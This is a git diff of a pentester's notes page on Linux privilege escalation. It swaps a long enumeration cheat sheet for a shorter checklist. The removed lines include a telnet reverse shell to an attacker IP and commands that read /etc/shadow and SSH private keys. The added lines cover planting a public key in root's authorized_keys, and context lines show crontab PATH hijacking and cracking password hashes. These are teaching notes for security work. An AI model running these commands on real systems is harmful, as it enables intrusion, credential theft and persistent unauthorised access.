--- a/_posts/notes/system/2022-04-25-linux-pe.md
+++ b/_posts/notes/system/2022-04-25-linux-pe.md
@@ -7,388 +7,55 @@ tags: [privilage-escalation]
 permalink: /notes/system/linux-pe
 ---
 
-# Guess OS
-We can try the following commands:
+> Check the [Hacktricks](https://book.hacktricks.xyz/linux-unix/linux-privilege-escalation-checklist) checklist!
+{: .prompt-tip }
 
-- Distribution
+---
+
+# Enumeration
+
+There are some useful tools like:
+- [LinEnum](https://github.com/rebootuser/LinEnum)
+- [LinuxPrivChecker](https://github.com/sleventyeleven/linuxprivchecker)
+- [LinPEAS](https://github.com/carlospolop/PEASS-ng/tree/master/linPEAS)
+
+---
+
+# Kernel Exploits 
+
+If is an old server we can search for Kernel vulnerabilities. For example, one famous is [DirtyCow](https://github.com/dirtycow/dirtycow.github.io/wiki/PoCs).
+
+---
+
+# Vulnerable software
+
+Running `dpkg -l` to check software version.
+
+---
+
+# User Privileges 
+
+It's important to check which privileges have our user.
+
+We can try to see which commands are allowed to use:
 ```console
-$ cat /etc/issue
-$ cat /etc/*-release
-$ cat /etc/lsb-release
-$ cat /etc/redhat-release
+zero@pio$ sudo -l
+  (user : user) NOPASSWD: /bin/echo
+```
+In the above example we see the variable **NOPASSWD**, which means that *user* has no password protection. We can try to change to him:
+```console
+zero@pio$ sudo -u user /bin/echo Hello!
+  Hello!
 ```
 
-- Kernel version
+Try to logging in root directly:
 ```console
-$ cat /proc/version
-$ uname -a
-$ uname -mrs
-$ rpm -q kernel
-$ dmesg | grep Linux
-$ ls /boot | grep vmlinuz-
+sudo su -
 ```
 
-- Environmental variables
-```console
-$ cat /etc/profile
-$ cat /etc/bashrc
-$ cat ~/.bash_profile
-$ cat ~/.bashrc
-$ cat ~/.bash_logout
-$ env
-$ set
-```
+---
 
-- Printer?
-```console
-$ lpstat -a
-```
-
-# Apps and services
-- Services running and privileges
-```console
-$ ps aux
-$ ps -ef
-$ top
-$ cat /etc/services
-```
-
-- Services running by root
-```console
-$ ps aux | grep root
-$ ps -ef | grep root
-```
-
-- Apps installed, version and running
-```console
-$ ls -alh /usr/bin/
-$ ls -alh /sbin/
-$ dpkg -l
-$ rpm -qa
-$ ls -alh /var/cache/apt/archivesO
-$ ls -alh /var/cache/yum/
-```
-
-- Services misconfigured, vulnerables plugins
-```console
-$ cat /etc/syslog.conf
-$ cat /etc/chttp.conf
-$ cat /etc/lighttpd.conf
-$ cat /etc/cups/cupsd.conf
-$ cat /etc/inetd.conf
-$ cat /etc/apache2/apache2.conf
-$ cat /etc/my.conf
-$ cat /etc/httpd/conf/httpd.conf
-$ cat /opt/lampp/etc/httpd.conf
-$ ls -aRl /etc/ | awk '$1 ~ /^.*r.*/
-```
-
-- Jobs
-```console
-$ crontab -l
-$ ls -alh /var/spool/cron
-$ ls -al /etc/ | grep cron
-$ ls -al /etc/cron*
-$ cat /etc/cron*
-$ cat /etc/at.allow
-$ cat /etc/at.deny
-$ cat /etc/cron.allow
-$ cat /etc/cron.deny
-$ cat /etc/crontab
-$ cat /etc/anacrontab
-$ cat /var/spool/cron/crontabs/root
-```
-
-- bash users/passwords
-```console
-$ grep -i user [filename]
-$ grep -i pass [filename]
-$ grep -C 5 "password" [filename]
-$ find . -name "*.php" -print0 | xargs -0 grep -i -n "var $password"
-```
-
-# Comms and networking
-
-- NICs and connections
-```console
-$ /sbin/ifconfig -a
-$ cat /etc/network/interfaces
-$ cat /etc/sysconfig/network
-```
-
-- Network configuration, DHCP, DNS, Gateaway
-```console
-$ cat /etc/resolv.conf
-$ cat /etc/sysconfig/network
-$ cat /etc/networks
-$ iptables -L
-$ hostname
-$ dnsdomainname
-```
-
-- Users and host communicating
-```console
-$ lsof -i
-$ lsof -i :80
-$ grep 80 /etc/services
-$ netstat -antup
-$ netstat -antpx
-$ netstat -tulpn
-$ chkconfig --list
-$ chkconfig --list | grep 3:on
-$ last
-$ w
-```
-
-- Cache
-```console
-$ arp -e
-$ route
-$ /sbin/route -nee
-```
-
-- Packet sniffing
-```console
-$ tcpdump tcp dst [ip] [port] and tcp dst [ip] [port]
-```
-
-- Shell
-```console
-$ nc -lvp 4444    # Attacker. Input (Commands)
-$ nc -lvp 4445    # Attacker. Ouput (Results)
-$ telnet [atackers ip] 44444 | /bin/sh | [local ip] 44445    # On the targets system. Use the attackers IP!
-```
-
-- Port forwading
-```console
-$ FPipe.exe -l 80 -r 80 -s 80 192.168.1.7
-
-$ ssh -L 8080:127.0.0.1:80 root@192.168.1.7    # Local Port
-$ ssh -R 8080:127.0.0.1:80 root@192.168.1.7    # Remote Port
-
-$ mknod backpipe p ; nc -l -p 8080 < backpipe | nc 10.5.5.151 80 $backpipe    # Port Relay
-$ mknod backpipe p ; nc -l -p 8080 0 & < backpipe | tee -a inflow | nc localhost 80 | tee -a outflow 1$backpipe    # Proxy (Port 80 to 8080)
-$ mknod backpipe p ; nc -l -p 8080 0 & < backpipe | tee -a inflow | nc localhost 80 | tee -a outflow & 1$backpipe    # Proxy monitor (Port 80 to 8080)
-```
-
-- Tunneling
-```console
-$ ssh -D 127.0.0.1:9050 -N [username]@[ip]
-$ proxychains ifconfig
-```
-
-# Confidential information and users
-
-- Logins
-```console
-$ id
-$ who
-$ w
-$ last
-$ cat /etc/passwd | cut -d: -f1    # List of users
-$ grep -v -E "^#" /etc/passwd | awk -F: '$3 == 0 { print $1}'   # List of super users
-$ awk -F: '($3 == "0") {print}' /etc/passwd   # List of super users
-$ cat /etc/sudoers
-$ sudo -l
-```
-
-- Sensitive files
-```console
-$ cat /etc/passwd
-$ cat /etc/group
-$ cat /etc/shadow
-$ ls -alh /var/mail/
-```
-
-- Home directory
-```console
-$ ls -ahlR /root/
-$ ls -ahlR /home/
-```
-
-- Passwords
-```console
-$ cat /var/apache2/config.inc
-$ cat /var/lib/mysql/mysql/user.MYD
-$ cat /root/anaconda-ks.cfg
-```
-
-- History
-```console
-$ cat ~/.bash_history
-$ cat ~/.nano_history
-$ cat ~/.atftp_history
-$ cat ~/.mysql_history
-$ cat ~/.php_history
-```
-
-- User information
-```console
-$ cat ~/.bashrc
-$ cat ~/.profile
-$ cat /var/mail/root
-$ cat /var/spool/mail/root
-```
-
-- Private key
-```console
-$ cat ~/.ssh/authorized_keys
-$ cat ~/.ssh/identity.pub
-$ cat ~/.ssh/identity
-$ cat ~/.ssh/id_rsa.pub
-$ cat ~/.ssh/id_rsa
-$ cat ~/.ssh/id_dsa.pub
-$ cat ~/.ssh/id_dsa
-$ cat /etc/ssh/ssh_config
-$ cat /etc/ssh/sshd_config
-$ cat /etc/ssh/ssh_host_dsa_key.pub
-$ cat /etc/ssh/ssh_host_dsa_key
-$ cat /etc/ssh/ssh_host_rsa_key.pub
-$ cat /etc/ssh/ssh_host_rsa_key
-$ cat /etc/ssh/ssh_host_key.pub
-$ cat /etc/ssh/ssh_host_key
-```
-
-# File System
-- **/etc/** write
-```console
-$ ls -aRl /etc/ | awk '$1 ~ /^.*w.*/' 2$/dev/null     # Anyone
-$ ls -aRl /etc/ | awk '$1 ~ /^..w/' 2$/dev/null       # Owner
-$ ls -aRl /etc/ | awk '$1 ~ /^.....w/' 2$/dev/null    # Group
-$ ls -aRl /etc/ | awk '$1 ~ /w.$/' 2$/dev/null        # Other
-
-$ find /etc/ -readable -type f 2$/dev/null               # Anyone
-$ find /etc/ -readable -type f -maxdepth 1 2$/dev/null   # Anyone
-```
-
-- List **/var/**
-```console
-$ ls -alh /var/log
-$ ls -alh /var/mail
-$ ls -alh /var/spool
-$ ls -alh /var/spool/lpd
-$ ls -alh /var/lib/pgsql
-$ ls -alh /var/lib/mysql
-$ cat /var/lib/dhcp3/dhclient.leases
-```
-
-- Hidden files
-```console
-$ ls -alhR /var/www/
-$ ls -alhR /srv/www/htdocs/
-$ ls -alhR /usr/local/www/apache22/data/
-$ ls -alhR /opt/lampp/htdocs/
-$ ls -alhR /var/www/html/
-```
-
-- Logs
-```console
-$ cat /etc/httpd/logs/access_log
-$ cat /etc/httpd/logs/access.log
-$ cat /etc/httpd/logs/error_log
-$ cat /etc/httpd/logs/error.log
-$ cat /var/log/apache2/access_log
-$ cat /var/log/apache2/access.log
-$ cat /var/log/apache2/error_log
-$ cat /var/log/apache2/error.log
-$ cat /var/log/apache/access_log
-$ cat /var/log/apache/access.log
-$ cat /var/log/auth.log
-$ cat /var/log/chttp.log
-$ cat /var/log/cups/error_log
-$ cat /var/log/dpkg.log
-$ cat /var/log/faillog
-$ cat /var/log/httpd/access_log
-$ cat /var/log/httpd/access.log
-$ cat /var/log/httpd/error_log
-$ cat /var/log/httpd/error.log
-$ cat /var/log/lastlog
-$ cat /var/log/lighttpd/access.log
-$ cat /var/log/lighttpd/error.log
-$ cat /var/log/lighttpd/lighttpd.access.log
-$ cat /var/log/lighttpd/lighttpd.error.log
-$ cat /var/log/messages
-$ cat /var/log/secure
-$ cat /var/log/syslog
-$ cat /var/log/wtmp
-$ cat /var/log/xferlog
-$ cat /var/log/yum.log
-$ cat /var/run/utmp
-$ cat /var/webmin/miniserv.log
-$ cat /var/www/logs/access_log
-$ cat /var/www/logs/access.log
-$ ls -alh /var/lib/dhcp3/
-$ ls -alh /var/log/postgresql/
-$ ls -alh /var/log/proftpd/
-$ ls -alh /var/log/samba/
-
-Note: auth.log, boot, btmp, daemon.log, debug, dmesg, kern.log, mail.info, mail.log, mail.warn, messages, syslog, udev, wtmp
-```
-
-- Break jail
-```console
-$ python -c 'import pty;pty.spawn("/bin/bash")'
-$ echo os.system('/bin/bash')
-$ /bin/sh -i
-```
-
-- Mount
-```console
-$ mount
-$ df -h
-$ cat /etc/fstab
-```
-
-- Sticky bits, SUID, GUID
-```console
-$ find / -perm -1000 -type d 2$/dev/null   # Sticky bit - Only the owner of the directory or the owner of a file can delete or rename here.
-$ find / -perm -g=s -type f 2$/dev/null    # SGID (chmod 2000) - run as the group, not the user who started it.
-$ find / -perm -u=s -type f 2$/dev/null    # SUID (chmod 4000) - run as the owner, not the user who started it.
-
-$ find / -perm -g=s -o -perm -u=s -type f 2$/dev/null    # SGID or SUID
-$ for i in `locate -r "bin$"`; do find $i \( -perm -4000 -o -perm -2000 \) -type f 2$/dev/null; done    # Looks in 'common' places: /bin, /sbin, /usr/bin, /usr/sbin, /usr/local/bin, /usr/local/sbin and any other *bin, for SGID or SUID (Quicker search)
-
-$ find / -perm -g=s -o -perm -4000 ! -type l -maxdepth 3 -exec ls -ld {} \; 2$/dev/null # find starting at root (/), SGID or SUID, not Symbolic links, only 3 folders deep, list with more detail and hide any errors (e.g. permission denied)
-```
-
-- Write permission
-```console
-$ find / -writable -type d 2$/dev/null      # world-writeable folders
-$ find / -perm -222 -type d 2$/dev/null     # world-writeable folders
-$ find / -perm -o w -type d 2$/dev/null     # world-writeable folders
-
-$ find / -perm -o x -type d 2$/dev/null     # world-executable folders
-
-$ find / \( -perm -o w -perm -o x \) -type d 2$/dev/null   # world-writeable & executable folders
-```
-
-- Word-writeable, nobody files
-```console
-$ find / -xdev -type d \( -perm -0002 -a ! -perm -1000 \) -print   # world-writeable files
-$ find /dir -xdev \( -nouser -o -nogroup \) -print   # Noowner files
-```
-
-# Finding exploit code
-- Languages installed
-```console
-$ find / -name perl*
-$ find / -name python*
-$ find / -name gcc*
-$ find / -name cc
-```
-
-- Files uploaded
-```console
-$ find / -name wget
-$ find / -name nc*
-$ find / -name netcat*
-$ find / -name tftp*
-$ find / -name ftp
-```
-
-$ [Source](https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/)
-
-# Explotation
+# Files
 
 ### /etc/shadow
 If we can read the file **/etc/shadow** we can try to break the hashes with **john**:
@@ -409,7 +76,15 @@ $ openssl passwd [password]
 ```
 Then we replace the **x** in the same line as the root with the hash, now we can log as root.
 
-### PATH and crontab
+---
+
+# Scheduled Tasks
+
+We can find *crontab* in the following path:
+- `/etc/crontab`{: .filepath}
+- `/etc/cron.d`{: .filepath}
+- `/var/spool/cron/crontabs/root`{: .filepath}
+
 If in the **/etc/crontab** we have the PATH with the **/home/user** we can create the following script in the home:
 ```console
 #!/bin/bash
@@ -423,8 +98,42 @@ $ /tmp/rootbash -p
 ```
 Now we are root.
 
+---
+
+# Exposed Credentials
+
+We can try searching for credentials, as in configuration, log or history files (**bash_history**).
+Don't forget about **Password Reuse**.
+
+---
+
+# SSH
+
+Each user has a `/.ssh/`{: .filepath} folder. If we can read the keys we can connect directly. Usually they are:
+- `/home/user/.ssh/id_rsa`{: .filepath}
+- `/root/.ssh/id_rsa`{: .filepath}
+
+To connect using the RSA:
+```console
+zero@pio$ chmod 600 id_rsa
+zero@pio$ ssh user@<ip> -i id_rsa
+```
+
+If we can write in the `/.ssh/`{: .filepath} we can write our public key inside the target machine, at `/home/user/.ssh/authorized_keys`{: .filepath}. The current SSH configuration will not accept keys written by other users, so it will only work if we have already gained control over that user.
+First, create a new key. Copy the `key.pub` inside `/root/.ssh/authorized_keys`{: .filepath}.
+```console
+zero@pio$ ssh-keygen -f keys
+
+victim@machine$ echo "ssh-rsa AAAAB...SNIP...M= user@zeropio" >> /root/.ssh/authorized_keys
+
+zero@pio$ ssh root@10.10.10.10 -i key
+root@remotehost$ 
+```
+
+---
 
 # Tools
-- [linPEAS](https://github.com/carlospolop/PEASS-ng/blob/master/linPEAS/)
 - [Kernel Vulnerabilities](https://github.com/jondonas/linux-exploit-suggester-2)
+- [Useful practices](https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/)
+- [GTFOBins](https://gtfobins.github.io/)
 
